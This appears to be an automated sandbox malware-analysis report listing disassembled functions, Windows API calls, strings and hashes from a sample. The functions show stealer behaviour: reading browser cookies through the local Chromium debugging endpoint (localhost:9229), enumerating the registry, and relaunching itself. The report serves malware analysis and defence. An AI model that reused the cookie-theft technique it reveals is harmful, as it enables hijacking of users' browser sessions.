                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: 28e24491fb09b49b20d7f29f85f46c41191601f19b159fc70f396057db7c0388
                                  • Instruction ID: a59e4b3c7deaf6f316436722b4b23badc49d4a0a626aa680d2f61eda1ec87176
                                  • Opcode Fuzzy Hash: 28e24491fb09b49b20d7f29f85f46c41191601f19b159fc70f396057db7c0388
                                  • Instruction Fuzzy Hash: 6BB19071A203469BDB21FF64D895EAF77B5AF44340F144228F885AB351DB30EC258B90
                                  Function 002B92B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002B90C0: InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B90DF
                                    • Part of subcall function 002B90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 002B90FC
                                    • Part of subcall function 002B90C0: InternetCloseHandle.WININET(00000000), ref: 002B9109
                                  • strlen.MSVCRT ref: 002B92E1
                                  • strlen.MSVCRT ref: 002B92FA
                                    • Part of subcall function 002B8980: std::_Xinvalid_argument.LIBCPMT ref: 002B8996
                                  • strlen.MSVCRT ref: 002B9399
                                  • strlen.MSVCRT ref: 002B93E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 002B9547
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002B9559
                                  • lstrcat.KERNEL32(?,?), ref: 002B956A
                                  • lstrcat.KERNEL32(?,002E4B98), ref: 002B957C
                                  • lstrcat.KERNEL32(?,?), ref: 002B958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 002B959F
                                  • lstrlen.KERNEL32(?), ref: 002B95B6
                                  • lstrlen.KERNEL32(?), ref: 002B95DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B9614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: 73939af79f24fd699a3d6108c6e8019c4305f5a6223e0142304c98dd646d3e6f
                                  • Instruction ID: 4d968477973c859e3580cd9de21bbefc1f6cb72d4efcd64e02ff703a328a366e
                                  • Opcode Fuzzy Hash: 73939af79f24fd699a3d6108c6e8019c4305f5a6223e0142304c98dd646d3e6f
                                  • Instruction Fuzzy Hash: E7E13A71E20258DFDF10DFA8D880ADDBBB5BF48340F6044A9E649A7241DB309E95CF91
                                  Function 002CD980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 002CD9A1
                                  • memset.MSVCRT ref: 002CD9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CD9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CDA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CDA1C
                                  • lstrcat.KERNEL32(?,011CE2B0), ref: 002CDA36
                                  • lstrcat.KERNEL32(?,?), ref: 002CDA4A
                                  • lstrcat.KERNEL32(?,011CD580), ref: 002CDA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CDA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002CDA95
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CDAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: d3c3a4c97b3ef0bed005e2b188239ee821445be194e798a4966d64237d85f31b
                                  • Instruction ID: ee4dae3eb595c98bdf7852d9a2202459af6408e50ffbbb46b01e6dd810f59aa4
                                  • Opcode Fuzzy Hash: d3c3a4c97b3ef0bed005e2b188239ee821445be194e798a4966d64237d85f31b
                                  • Instruction Fuzzy Hash: B6B1907192025A9FDB10EF64DC84EEEB7B9AF88300F544579E94AE7241DA309E64CF90
                                  Function 002BB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BB330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BB3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB3D9
                                  • lstrlen.KERNEL32(002E4C50), ref: 002BB450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB474
                                  • lstrcat.KERNEL32(00000000,002E4C50), ref: 002BB480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB4A9
                                  • lstrlen.KERNEL32(00000000), ref: 002BB52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BB55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB587
                                  • lstrlen.KERNEL32(002E4AD4), ref: 002BB5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB622
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002BB62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB65E
                                  • lstrlen.KERNEL32(?), ref: 002BB767
                                  • lstrlen.KERNEL32(?), ref: 002BB776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BB79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 4a1a51320a58a400e565561013e415e512eb98fdc14af132c2ff1f177e43c1c7
                                  • Instruction ID: 30c975fdbe35ff505528aac6cdb618aacd1496f45872244ad3dbf9eac8764afa
                                  • Opcode Fuzzy Hash: 4a1a51320a58a400e565561013e415e512eb98fdc14af132c2ff1f177e43c1c7
                                  • Instruction Fuzzy Hash: 1B026330A21206CFDB26DF65D988AAAB7F5BF40344F19806DE4499B3A2D771DC52CF80
                                  Function 002D3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  • RegOpenKeyExA.ADVAPI32(?,011CB0D8,00000000,00020019,?), ref: 002D37BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 002D37F7
                                  • wsprintfA.USER32 ref: 002D3822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 002D3840
                                  • RegCloseKey.ADVAPI32(?), ref: 002D384E
                                  • RegCloseKey.ADVAPI32(?), ref: 002D3858
                                  • RegQueryValueExA.ADVAPI32(?,011CE0E8,00000000,000F003F,?,?), ref: 002D38A1
                                  • lstrlen.KERNEL32(?), ref: 002D38B6
                                  • RegQueryValueExA.ADVAPI32(?,011CE1D8,00000000,000F003F,?,00000400), ref: 002D3927
                                  • RegCloseKey.ADVAPI32(?), ref: 002D3972
                                  • RegCloseKey.ADVAPI32(?), ref: 002D3989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: 204eb633b1d6bbd91b71ee61aa34dbcf82e72c9ac129f37ee8d0615a4f0dd493
                                  • Instruction ID: 39b74b5417003e8d6d945cd7be803073ef42de41dd96b855bd58efb4ee08b422
                                  • Opcode Fuzzy Hash: 204eb633b1d6bbd91b71ee61aa34dbcf82e72c9ac129f37ee8d0615a4f0dd493
                                  • Instruction Fuzzy Hash: 97918CB2D102499FCB10DFA4DD849EEB7B9FB48310F1485AAE909AB351D731AE45CF90
                                  Function 002B90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B90DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 002B90FC
                                  • InternetCloseHandle.WININET(00000000), ref: 002B9109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 002B9166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 002B9197
                                  • InternetCloseHandle.WININET(00000000), ref: 002B91A2
                                  • InternetCloseHandle.WININET(00000000), ref: 002B91A9
                                  • strlen.MSVCRT ref: 002B91BA
                                  • strlen.MSVCRT ref: 002B91ED
                                  • strlen.MSVCRT ref: 002B922E
                                  • strlen.MSVCRT ref: 002B924C
                                    • Part of subcall function 002B8980: std::_Xinvalid_argument.LIBCPMT ref: 002B8996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: 135f0a677fc9973d20038c769b77b3dc27f8ad60be1c3824affd482214d9e86d
                                  • Instruction ID: 2a90a81e8d0f1a7c810d3bd06c5047c9f38d148e5a62a608912d5986e368ca9a
                                  • Opcode Fuzzy Hash: 135f0a677fc9973d20038c769b77b3dc27f8ad60be1c3824affd482214d9e86d
                                  • Instruction Fuzzy Hash: 67512371A20245ABDB10DFA8DC85FDEF7BEDB44310F14016AF908E3280DBB4AA548B65
                                  Function 002D1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 002D16A1
                                  • lstrcpy.KERNEL32(00000000,011BB608), ref: 002D16CC
                                  • lstrlen.KERNEL32(?), ref: 002D16D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D16F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 002D1704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D172A
                                  • lstrlen.KERNEL32(011CA560), ref: 002D173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D1762
                                  • lstrcat.KERNEL32(00000000,011CA560), ref: 002D176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D1792
                                  • ShellExecuteEx.SHELL32(?), ref: 002D17CD
                                  • ExitProcess.KERNEL32 ref: 002D1803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: 8ed84cfaea272ac31d4364978c8d146c8c34b115098fd45c927072d5e9d15736
                                  • Instruction ID: 659a3179c4115c6161752966db044e06022a94c6603c5577ca5a64711c01d443
                                  • Opcode Fuzzy Hash: 8ed84cfaea272ac31d4364978c8d146c8c34b115098fd45c927072d5e9d15736
                                  • Instruction Fuzzy Hash: 90518F7092165AABEB11DFA4DD84A9EF7F9AF48300F10413AE509E7351DB30AE25CB94
                                  Function 002CEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CEFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CF012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002CF026
                                  • lstrlen.KERNEL32(00000000), ref: 002CF035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 002CF053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 002CF081
                                  • lstrlen.KERNEL32(?), ref: 002CF094
                                  • lstrlen.KERNEL32(00000000), ref: 002CF0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 002CF0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 002CF13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: fd6e8bdc1d947116d7430b165648f663404e898213376cb14b9ae22794130410
                                  • Instruction ID: 42357b0735d3ada3f582a9407f6cbe237d0cfc83dea79e4e84e404d3f151648c
                                  • Opcode Fuzzy Hash: fd6e8bdc1d947116d7430b165648f663404e898213376cb14b9ae22794130410
                                  • Instruction Fuzzy Hash: D151B1319302429FCB21EF34DD49FAE77A5AF41740F19427CF889AB212DA70DC258B90
                                  Function 002BA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(011C9068,004E9BD8,0000FFFF), ref: 002BA026
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BA053
                                  • lstrlen.KERNEL32(004E9BD8), ref: 002BA060
                                  • lstrcpy.KERNEL32(00000000,004E9BD8), ref: 002BA08A
                                  • lstrlen.KERNEL32(002E4C4C), ref: 002BA095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BA0B2
                                  • lstrcat.KERNEL32(00000000,002E4C4C), ref: 002BA0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BA0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BA0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BA114
                                  • SetEnvironmentVariableA.KERNEL32(011C9068,00000000), ref: 002BA12F
                                  • LoadLibraryA.KERNEL32(011CDA90), ref: 002BA143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
